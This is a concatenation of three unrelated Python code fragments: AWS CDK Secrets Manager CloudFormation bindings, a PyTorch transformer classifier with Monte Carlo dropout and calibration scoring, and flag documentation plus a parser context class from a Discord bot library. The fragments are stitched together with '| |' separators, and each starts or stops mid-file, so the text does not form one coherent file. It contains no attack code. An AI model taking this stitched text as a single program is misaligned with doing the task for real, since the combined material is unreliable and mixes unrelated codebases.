self._values["kms_key_id"] = kms_key_id
@builtins.property
def region(self) -> builtins.str:
'''``CfnSecret.ReplicaRegionProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html#cfn-secretsmanager-secret-replicaregion-region
'''
result = self._values.get("region")
assert result is not None, "Required property 'region' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def kms_key_id(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.ReplicaRegionProperty.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html#cfn-secretsmanager-secret-replicaregion-kmskeyid
'''
result = self._values.get("kms_key_id")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ReplicaRegionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretProps",
jsii_struct_bases=[],
name_mapping={
"description": "description",
"generate_secret_string": "generateSecretString",
"kms_key_id": "kmsKeyId",
"name": "name",
"replica_regions": "replicaRegions",
"secret_string": "secretString",
"tags": "tags",
},
)
class CfnSecretProps:
def __init__(
self,
*,
description: typing.Optional[builtins.str] = None,
generate_secret_string: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]] = None,
kms_key_id: typing.Optional[builtins.str] = None,
name: typing.Optional[builtins.str] = None,
replica_regions: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]] = None,
secret_string: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Sequence[aws_cdk.core.CfnTag]] = None,
) -> None:
'''Properties for defining a ``AWS::SecretsManager::Secret``.
:param description: ``AWS::SecretsManager::Secret.Description``.
:param generate_secret_string: ``AWS::SecretsManager::Secret.GenerateSecretString``.
:param kms_key_id: ``AWS::SecretsManager::Secret.KmsKeyId``.
:param name: ``AWS::SecretsManager::Secret.Name``.
:param replica_regions: ``AWS::SecretsManager::Secret.ReplicaRegions``.
:param secret_string: ``AWS::SecretsManager::Secret.SecretString``.
:param tags: ``AWS::SecretsManager::Secret.Tags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if description is not None:
self._values["description"] = description
if generate_secret_string is not None:
self._values["generate_secret_string"] = generate_secret_string
if kms_key_id is not None:
self._values["kms_key_id"] = kms_key_id
if name is not None:
self._values["name"] = name
if replica_regions is not None:
self._values["replica_regions"] = replica_regions
if secret_string is not None:
self._values["secret_string"] = secret_string
if tags is not None:
self._values["tags"] = tags
@builtins.property
def description(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.Description``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-description
'''
result = self._values.get("description")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def generate_secret_string(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]]:
'''``AWS::SecretsManager::Secret.GenerateSecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-generatesecretstring
'''
result = self._values.get("generate_secret_string")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]], result)
@builtins.property
def kms_key_id(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-kmskeyid
'''
result = self._values.get("kms_key_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def name(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-name
'''
result = self._values.get("name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def replica_regions(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]]:
'''``AWS::SecretsManager::Secret.ReplicaRegions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-replicaregions
'''
result = self._values.get("replica_regions")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]], result)
@builtins.property
def secret_string(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.SecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-secretstring
'''
result = self._values.get("secret_string")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
'''``AWS::SecretsManager::Secret.Tags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-tags
'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.List[aws_cdk.core.CfnTag]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnSecretProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
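# Illustrative sketch (not part of the generated bindings): constructing the props
# object defined above. The values are hypothetical; the surrounding App/Stack
# wiring is outside this excerpt, so only the data classes shown here are used.
#
#   props = CfnSecretProps(
#       description="example secret",
#       generate_secret_string=CfnSecret.GenerateSecretStringProperty(password_length=32),
#   )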
@jsii.implements(aws_cdk.core.IInspectable)
class CfnSecretTargetAttachment(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretTargetAttachment",
):
'''A CloudFormation ``AWS::SecretsManager::SecretTargetAttachment``.
:cloudformationResource: AWS::SecretsManager::SecretTargetAttachment
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
secret_id: builtins.str,
target_id: builtins.str,
target_type: builtins.str,
) -> None:
'''Create a new ``AWS::SecretsManager::SecretTargetAttachment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param secret_id: ``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:param target_id: ``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:param target_type: ``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
'''
props = CfnSecretTargetAttachmentProps(
secret_id=secret_id, target_id=target_id, target_type=target_type
)
jsii.create(CfnSecretTargetAttachment, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="secretId")
def secret_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-secretid
'''
return typing.cast(builtins.str, jsii.get(self, "secretId"))
@secret_id.setter
def secret_id(self, value: builtins.str) -> None:
jsii.set(self, "secretId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="targetId")
def target_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targetid
'''
return typing.cast(builtins.str, jsii.get(self, "targetId"))
@target_id.setter
def target_id(self, value: builtins.str) -> None:
jsii.set(self, "targetId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="targetType")
def target_type(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targettype
'''
return typing.cast(builtins.str, jsii.get(self, "targetType"))
@target_type.setter
def target_type(self, value: builtins.str) -> None:
jsii.set(self, "targetType", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretTargetAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"secret_id": "secretId",
"target_id": "targetId",
"target_type": "targetType",
},
)
class CfnSecretTargetAttachmentProps:
def __init__(
self,
*,
secret_id: builtins.str,
target_id: builtins.str,
target_type: builtins.str,
) -> None:
'''Properties for defining a ``AWS::SecretsManager::SecretTargetAttachment``.
:param secret_id: ``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:param target_id: ``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:param target_type: ``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html
'''
self._values: typing.Dict[str, typing.Any] = {
"secret_id": secret_id,
"target_id": target_id,
"target_type": target_type,
}
@builtins.property
def secret_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-secretid
'''
result = self._values.get("secret_id")
assert result is not None, "Required property 'secret_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def target_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targetid
'''
result = self._values.get("target_id")
assert result is not None, "Required property 'target_id' is missing"
return typing.cast(builtins.str, result)
| |
# BAN_main.py
# -*- coding: utf-8 -*-
"""EN3-BT MCD
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1cnvSgNDexJ0cqrTWGygI_smZ0y8EIWZn
"""
import torch
import numpy as np
import tqdm
import copy
from torch.nn import functional as F
from torch.nn.modules.module import Module
from sklearn.calibration import calibration_curve, CalibratedClassifierCV
from torch.nn.modules.activation import MultiheadAttention
from torch.nn.modules.container import ModuleList
from torch.nn.init import xavier_uniform_
from torch.nn.modules.dropout import Dropout
from torch.nn.modules.linear import Linear
from torch.nn.modules.normalization import LayerNorm
from torch.utils.data import DataLoader, Dataset
import logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
logging.getLogger().setLevel(logging.INFO)
from utils import *
import math
from torch.autograd import Variable
import re
import pandas as pd
torch.manual_seed(2)
def set_dropout_to_train(m):
if type(m) == torch.nn.Dropout:
m.train()
class Embedder(Module):
def __init__(self, vocab_size, d_model):
super().__init__()
self.d_model = d_model
print(vocab_size, d_model)
self.embed = torch.nn.Embedding(vocab_size + 1, d_model)
def forward(self, x):
x = self.embed(x)
return x
class PositionalEncoder(Module):
def __init__(self, d_model, max_seq_len = 768, dropout = 0.5):
super().__init__()
self.d_model = d_model
self.dropout = Dropout(dropout)
        # create constant 'pe' matrix with values dependent on
        # pos and i
pe = torch.zeros(max_seq_len, d_model)
for pos in range(max_seq_len):
for i in range(0, d_model, 2):
pe[pos, i] = \
math.sin(pos / (10000 ** ((2 * i)/d_model)))
pe[pos, i + 1] = \
math.cos(pos / (10000 ** ((2 * (i + 1))/d_model)))
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
# make embeddings relatively larger
x = x * math.sqrt(self.d_model)
#add constant to embedding
seq_len = x.size(1)
pe = Variable(self.pe[:,:seq_len], requires_grad=False)
        if x.is_cuda:
            # .cuda() is not in-place; rebind so the positional signal is on the same device as x
            pe = pe.cuda()
x = x + pe
return self.dropout(x)
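# Illustrative sketch: PositionalEncoder scales the embeddings by sqrt(d_model),
# adds the constant sinusoidal 'pe' buffer built in __init__, and applies dropout.
# Sizes below are hypothetical, not taken from this file:
#
#   embed = Embedder(vocab_size=1000, d_model=32)
#   pos_enc = PositionalEncoder(d_model=32)
#   tokens = torch.randint(0, 1000, (2, 16))   # (batch, seq_len)
#   x = pos_enc(embed(tokens))                 # (2, 16, 32): embeddings + positional signal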
def get_clones(module, N):
return torch.nn.ModuleList([copy.deepcopy(module) for i in range(N)])
def attention(q, k, v, d_k, mask=None, dropout=None):
    scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)
    if mask is not None:
        # mask out disallowed positions before the softmax
        scores = scores.masked_fill(mask == 0, -1e9)
    scores = F.softmax(scores, dim=-1)
    if dropout is not None:
        scores = dropout(scores)
    output = torch.matmul(scores, v)
    return output
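# Note: attention() above is scaled dot-product attention,
# output = softmax(Q @ K^T / sqrt(d_k)) @ V, with optional dropout applied to the
# attention weights; for q, k, v of shape (batch, heads, seq_len, d_k) the output
# keeps the shape of v.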
class MultiHeadAttention(Module):
def __init__(self, heads, d_model, dropout = 0.5):
super().__init__()
self.d_model = d_model
self.d_k = d_model // heads
self.h = heads
self.q_linear = torch.nn.Linear(d_model, d_model)
self.v_linear = torch.nn.Linear(d_model, d_model)
self.k_linear = torch.nn.Linear(d_model, d_model)
self.dropout = Dropout(dropout)
self.out = torch.nn.Linear(d_model, d_model)
def forward(self, q, k, v, mask=None):
bs = q.size(0)
# perform linear operation and split into h heads
k = self.k_linear(k).view(bs, -1, self.h, self.d_k)
q = self.q_linear(q).view(bs, -1, self.h, self.d_k)
v = self.v_linear(v).view(bs, -1, self.h, self.d_k)
# transpose to get dimensions bs * h * sl * d_model
k = k.transpose(1,2)
q = q.transpose(1,2)
v = v.transpose(1,2)
        # calculate attention using the scaled dot-product function defined above
scores = attention(q, k, v, self.d_k, mask, self.dropout)
# concatenate heads and put through final linear layer
concat = scores.transpose(1,2).contiguous().view(bs, -1, self.d_model)
output = self.out(concat)
return output
class Norm(Module):
def __init__(self, d_model, eps = 1e-6):
super().__init__()
self.size = d_model
# create two learnable parameters to calibrate normalisation
self.alpha = torch.nn.Parameter(torch.ones(self.size))
self.bias = torch.nn.Parameter(torch.zeros(self.size))
self.eps = eps
def forward(self, x):
norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \
/ (x.std(dim=-1, keepdim=True) + self.eps) + self.bias
return norm
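# Note: Norm is a hand-rolled layer normalisation over the last dimension,
# y = alpha * (x - mean(x)) / (std(x) + eps) + bias, with alpha and bias learned
# per feature (comparable in spirit to torch.nn.LayerNorm(d_model)).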
class FeedForward(Module):
def __init__(self, d_model, d_ff=2048, dropout = 0.3):
super().__init__()
# We set d_ff as a default to 2048
self.linear_1 = torch.nn.Linear(d_model, d_ff)
self.dropout = Dropout(dropout)
self.linear_2 = torch.nn.Linear(d_ff, d_model)
def forward(self, x):
x = self.dropout(F.relu(self.linear_1(x)))
x = self.linear_2(x)
return x
class EncoderLayer(Module):
def __init__(self, d_model, heads, dropout = 0.3):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.attn = MultiHeadAttention(heads, d_model)
self.ff = FeedForward(d_model)
self.dropout_1 = Dropout(dropout)
self.dropout_2 = Dropout(dropout)
def forward(self, x, mask = None):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn(x2,x2,x2,mask = None))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.ff(x2))
return x
class Encoder(Module):
def __init__(self, vocab_size = 1000, d_model = 32, N = 1, heads= 1):
super().__init__()
self.N = N
self.embed = Embedder(vocab_size, d_model)
self.pe = PositionalEncoder(d_model)
self.layers = get_clones(EncoderLayer(d_model, heads), N)
self.norm = Norm(d_model)
self.output_layer = torch.nn.Linear(d_model**2, 1)
self.output_activation = torch.nn.Sigmoid()
def forward(self, src):
bdim = src.shape[0]
x = self.embed(src)
#tlen = int(math.sqrt(src.shape[1]))
#x = src.reshape(int(src.shape[0]), tlen, tlen)
x = self.pe(x)
for i in range(self.N):
x = self.layers[i](x)
x = self.norm(x)
outputs = torch.autograd.Variable(torch.zeros(bdim), requires_grad = False)
for j in range(bdim):
outputs[j] = self.output_layer(x[j,:,:].flatten())
s = self.output_activation(outputs)
return s
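# Illustrative sketch of the Encoder above (hypothetical sizes). Note that forward()
# flattens each (seq_len, d_model) block into a Linear(d_model**2, 1) head, so the
# padded sequence length must equal d_model, as it does with BAN's defaults below:
#
#   enc = Encoder(vocab_size=1000, d_model=32, N=1, heads=1)
#   batch = torch.randint(0, 1000, (4, 32))   # (batch, seq_len == d_model)
#   scores = enc(batch)                       # tensor of 4 sigmoid scores in [0, 1]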
class Dataset_single(Dataset):
def __init__(self, features, targets = None, transform=None):
self.features = features
if not targets is None:
self.targets = np.array(targets)
else:
self.targets = None
def __len__(self):
return self.features.shape[0]
def __getitem__(self, index):
instance = torch.tensor(self.features[index],
dtype=torch.long,
device='cpu')
if self.targets is not None:
target = torch.as_tensor(self.targets.reshape(-1, 1)[index],
device='cpu')
else:
target = -1
return instance, target
# This is where we train our model
class BAN:
def __init__ (self, num_epochs = 200, vocab_size = 100000, stopping_crit = 5, learning_rate = 0.001, tokenizer_num_words = 100000, max_padding = 256,N=1,heads = 1, batch_size = 64):
#self.learning_rate = 0.001
self.d_model = max_padding
self.N = N
self.attention_heads = heads
self.max_padding = max_padding
self.image_folder = None
self.learning_rate = learning_rate
self.classes_ = [0,1]
self.validation_index = 0
self.batch_size = batch_size
self.threshold_perf_tuples = []
self.num_epochs = num_epochs
self.probability_threshold = None
self.vocab_size = vocab_size
self.stopping_crit = stopping_crit
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
logging.info("Using {}".format(self.device))
self.tokenizer = Tokenizer(num_words=tokenizer_num_words)
def pad_sequence(self, list_of_texts):
# https://towardsdatascience.com/text-classification-in-keras-part-2-how-to-use-the-keras-tokenizer-word-representations-fd571674df23
# pad_seq = get_input_attentions(list_of_texts, max_size = self.max_padding)
# logging.info(pad_seq.shape)
self.tokenizer.fit_on_texts(list_of_texts)
sequences = self.tokenizer.texts_to_sequences(list_of_texts)
pad_seq = pad_sequences(sequences, maxlen=self.max_padding)
return pad_seq
def encode_input_text_integer(self, list_of_texts, mapping = None):
## somewhat adhoc -> can be improved -> TODO: Byte pair.
unique_words = set()
for text in list_of_texts:
[unique_words.add(x) for x in text.strip().split()]
unique_words = list(unique_words)
if mapping is None:
mapping = {}
for index, word in enumerate(unique_words):
mapping[word] = index+1
encoded_texts = []
for text in list_of_texts:
encoded_sentence = [mapping[x] for x in text.strip().split()] + [0]*self.max_padding
encoded_texts.append(np.array(encoded_sentence[0:self.max_padding]))
return encoded_texts, mapping
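    # Illustrative note: encode_input_text_integer() builds an ad-hoc 1-based
    # word -> integer mapping (0 is reserved for padding) and pads/truncates each
    # sentence to max_padding tokens, e.g. (hypothetical values; set ordering is
    # not deterministic, `ban` being an instance of this class):
    #
    #   encoded, mapping = ban.encode_input_text_integer(["hello world", "hello"])
    #   # mapping could be {'hello': 1, 'world': 2}; each row of `encoded` has
    #   # length max_padding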
def predict_proba(self, input_text_sequences, T=10, output_mean_probabilities = True):
pad_seq = input_text_sequences #pad_sequences(input_text_sequences, maxlen=self.max_padding)
pad_seq = np.array(pad_seq)
val_dataset = Dataset_single(pad_seq)
val_dataset = DataLoader(val_dataset, batch_size = self.batch_size, shuffle = False)
outputs = []
p = []
w= []
for i, (features, labels) in tqdm.tqdm(enumerate(val_dataset), total = len(val_dataset)):
features = features.to(self.device)
collection_of_preds = []
self.model.eval() ## Immutable during predictions.
self.model.apply(set_dropout_to_train) ## Unlock Dropout layers.
for _ in range(T):
prediction = self.model(features).detach().cpu().numpy()
collection_of_preds.append(prediction)
p = np.matrix(collection_of_preds).T
w.append(p)
w = np.concatenate(w, axis = 0)
assert w.shape[0] == pad_seq.shape[0]
assert w.shape[1] == T
MC_pred = w.reshape(pad_seq.shape[0], T)
pred = pd.DataFrame(MC_pred)
MC_pred_positive = pred.mean(axis=1).values
MC_pred_negative = 1 - MC_pred_positive
MC_pred = np.vstack((MC_pred_negative, MC_pred_positive)).T
self.model.train()
return MC_pred.astype(np.float64)
def predict(self, input_text_sequences, T=100, output_mean_probabilities = True):
pad_seq = input_text_sequences #pad_sequences(input_text_sequences, maxlen=self.max_padding)
pad_seq = np.array(pad_seq)
val_dataset = Dataset_single(pad_seq)
val_dataset = DataLoader(val_dataset, batch_size = self.batch_size, shuffle = False)
outputs = []
p = []
w= []
for i, (features, labels) in tqdm.tqdm(enumerate(val_dataset), total = len(val_dataset)):
features = features.to(self.device)
collection_of_preds = []
self.model.eval() ## Immutable during predictions.
self.model.apply(set_dropout_to_train) ## Unlock Dropout layers.
for _ in range(T):
prediction = self.model(features).detach().cpu().numpy()
collection_of_preds.append(prediction)
p = np.matrix(collection_of_preds).T
w.append(p)
w = np.concatenate(w, axis = 0)
assert w.shape[0] == pad_seq.shape[0]
assert w.shape[1] == T
if output_mean_probabilities:
MC_pred = w.reshape(pad_seq.shape[0], T)
pred = pd.DataFrame(MC_pred)
MC_pred = pred.mean(axis=1).values
else:
MC_pred = w.reshape(pad_seq.shape[0], T)
self.model.train()
return MC_pred
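    # Note: predict() and predict_proba() implement Monte Carlo dropout: the model
    # is switched to eval() but the Dropout modules are forced back into train mode,
    # so each of the T forward passes is stochastic. The row-wise mean of the
    # (n_samples, T) matrix is the point estimate; its spread is an uncertainty
    # proxy, e.g. (illustrative, `ban` being a fitted instance):
    #
    #   raw = ban.predict(X_val, T=50, output_mean_probabilities=False)
    #   per_sample_std = raw.std(axis=1)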
def ece_score(self, probab_pred, real_y, mbin = 3, threshold = 0.5):
all_vals = len(real_y)
bin_perf = []
current_bin = 0
predictions = probab_pred.copy()
predictions[predictions >= threshold] = 1
predictions[predictions < threshold] = 0
reals_internal = []
predictions_internal = []
## compute bins (last one is extended with the remainder)
intercept_bins = [x for x in range(1,all_vals) if x % mbin == 0]
remainder = all_vals % mbin
if len(intercept_bins) == 0:
intercept_bins = [all_vals]
intercept_bins[-1] += remainder
intercept_index = 0
for j in range(all_vals):
if j == intercept_bins[intercept_index] and j > 0:
if intercept_index < len(intercept_bins)-1:
intercept_index += 1
current_bin += 1
                equals = np.where(np.array(reals_internal) == np.array(predictions_internal))
                # np.where returns a tuple of index arrays; count matches via its first element
                acc_bin = len(equals[0])/len(predictions_internal)
conf_bin = np.mean(np.array(predictions_internal))
bin_perf.append([current_bin, acc_bin, conf_bin,len(reals_internal)])
reals_internal = [real_y[j]]
predictions_internal = [predictions[j]]
else:
reals_internal.append(real_y[j])
predictions_internal.append(predictions[j])
ece_score_final = 0
for bins in bin_perf:
bin_size = bins[3]
total = len(probab_pred)
partial = (bin_size/total) * np.abs(bins[1] - bins[2])
ece_score_final += partial
return ece_score_final
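    # Note: ece_score() is a binned Expected Calibration Error. Predictions are
    # thresholded, split into consecutive bins of roughly `mbin` items, and
    # ECE = sum_b (|B_b| / n) * |accuracy(B_b) - confidence(B_b)|, where confidence
    # is the mean thresholded prediction inside the bin.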
def fit(self, input_text_sequences, targets, val_percentage = 0.2, adaptive_threshold = True, validation_metric = "precision"):
"""
The main fit method. | |
|
+---------------+---------------+-----------------------------------------------------------------------+
| id | 3 | Whether the entity should be picked up by it's name. |
+---------------+---------------+-----------------------------------------------------------------------+
| everywhere | 4 | Whether the entity should be searched out of the local scope. |
| | | Mostly pairs with the `id` flag. |
+---------------+---------------+-----------------------------------------------------------------------+
| profile | 5 | User parser only. Can be used when user cache is disabled to |
| | | ensure, that the user will have local guild profile if applicable. |
+---------------+---------------+-----------------------------------------------------------------------+
There are already precreated flags, which are the following:
+-------------------+-------------------------------------------+
| Name | Included flags |
+===================+===========================================+
| user_default | mention, name, id |
+-------------------+-------------------------------------------+
| user_all | mention, name, id, everywhere, profile |
+-------------------+-------------------------------------------+
| client_default | mention, name, id |
+-------------------+-------------------------------------------+
| client_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| role_default | mention, name, id |
+-------------------+-------------------------------------------+
| role_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| channel_default | mention, name, id |
+-------------------+-------------------------------------------+
| channel_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| emoji_default | mention, name, id |
+-------------------+-------------------------------------------+
| emoji_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| guild_default | id |
+-------------------+-------------------------------------------+
| guild_all | id, everywhere |
+-------------------+-------------------------------------------+
| message_default | url, id |
+-------------------+-------------------------------------------+
| message_all | url, id, everywhere |
+-------------------+-------------------------------------------+
| invite_default | url, id |
+-------------------+-------------------------------------------+
| invite_all | url, id |
+-------------------+-------------------------------------------+
    Note that if you use, for example, a `'user'` parser, then by default it will use the `user_default`
    flags and will ignore every flag value other than `user_all`. (A short usage sketch follows the
    precreated flag definitions below.)
    Some events, like `int` or `str`, do not have any flags, which means their behaviour cannot be altered.
"""
__keys__ = {
'url': 0,
'mention': 1,
'name': 2,
'id': 3,
'everywhere': 4,
'profile': 5,
}
user_default = NotImplemented
user_all = NotImplemented
client_default = NotImplemented
client_all = NotImplemented
role_default = NotImplemented
role_all = NotImplemented
channel_default = NotImplemented
channel_all = NotImplemented
emoji_default = NotImplemented
emoji_all = NotImplemented
guild_default = NotImplemented
guild_all = NotImplemented
message_default = NotImplemented
message_all = NotImplemented
invite_default = NotImplemented
invite_all = NotImplemented
ConverterFlag.user_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.user_all = ConverterFlag.user_default.update_by_keys(everywhere=True, profile=True)
ConverterFlag.client_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.client_all = ConverterFlag.client_default.update_by_keys(everywhere=True)
ConverterFlag.role_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.role_all = ConverterFlag.role_default.update_by_keys(everywhere=True)
ConverterFlag.channel_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.channel_all = ConverterFlag.channel_default.update_by_keys(everywhere=True)
ConverterFlag.emoji_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.emoji_all = ConverterFlag.emoji_default.update_by_keys(everywhere=True)
ConverterFlag.guild_default = ConverterFlag().update_by_keys(id=True)
ConverterFlag.guild_all = ConverterFlag.guild_default.update_by_keys(everywhere=True)
ConverterFlag.message_default = ConverterFlag().update_by_keys(url=True, id=True)
ConverterFlag.message_all = ConverterFlag.message_default.update_by_keys(everywhere=True)
ConverterFlag.invite_default = ConverterFlag().update_by_keys(url=True, id=True)
ConverterFlag.invite_all = ConverterFlag.invite_default
CONVERTER_FLAG_URL = 1 << ConverterFlag.__keys__['url']
CONVERTER_FLAG_MENTION = 1 << ConverterFlag.__keys__['mention']
CONVERTER_FLAG_NAME = 1 << ConverterFlag.__keys__['name']
CONVERTER_FLAG_ID = 1 << ConverterFlag.__keys__['id']
CONVERTER_FLAG_EVERYWHERE = 1 << ConverterFlag.__keys__['everywhere']
CONVERTER_FLAG_PROFILE = 1 << ConverterFlag.__keys__['profile']
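# Illustrative sketch (own addition, assuming only the ConverterFlag API defined
# above): a custom flag can be derived from a precreated one, e.g. a user parser
# that also searches outside the local scope but never touches profiles:
#
#     custom_user_flags = ConverterFlag.user_default.update_by_keys(everywhere=True)
#     assert custom_user_flags & CONVERTER_FLAG_EVERYWHERE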
class ContentParserContext:
"""
Content parser instance context used when parsing a message's content.
Attributes
----------
client : ``Client``
The respective client.
content : `str`
A message's content after its prefix.
index : `int`
The index of the last parsed character's end.
last_part : `str` or `None`
The last parsed part.
last_start : `int`
The start index of the last returned string.
length : `int`
The length of the string to parse.
message : ``Message``
The respective message.
result : `list` of `Any`
The successfully parsed objects.
separator : ``ContentParameterSeparator``
The parameter separator of the parser.
"""
